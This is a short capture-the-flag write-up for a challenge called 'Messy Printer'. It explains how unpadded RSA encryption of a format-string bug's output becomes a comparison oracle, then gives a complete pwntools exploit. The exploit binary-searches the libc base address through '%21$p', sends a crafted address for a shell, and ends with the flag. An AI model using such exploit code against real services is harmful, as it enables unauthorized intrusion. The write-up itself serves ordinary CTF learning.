# Messy Printer there is source code for this program goal is to leak libc base address a FSB but output is encrypt with RSA => RSA is vulnerable since it doesn't use padding but > // if n / 2 > plaintext > // then plaintext = n - plaintext short string like address the difference is kept when e is small => first guess address then FSB the libc address => compare two cipher if larger then guess is too small => binary search ```python= from pwn import * from Crypto.Util.number import bytes_to_long r = remote('eofqual.zoolab.org', 4001) # r = process('./messy_printer') def try_if_same(data1, data2): r.sendafter('[y/n]: \n', 'y') r.sendlineafter('Give me title: \n', data1) d1 = r.recvuntil('\nGive me ')[:-9] r.sendlineafter('content: \n', data2) d2 = r.recvuntil('\nContinue? ')[:-11] return bytes_to_long(d1), bytes_to_long(d2) t = 0x7f0000000000 s = 0x8000000000 while True: a, b = try_if_same(hex(t), "%21$p") if a == b: break elif a > b: t += s else: t -= s s = s // 2 t += s input() r.sendafter('[y/n]: \n', 'n') print(hex(t)) r.sendafter('Give me the magic: \n', p64(t - 0x270b3 + 0x55410)) r.interactive() ``` FLAG{CONGRATS!_However_this_should_be_the_easiest_one...} ###### tags: `solved`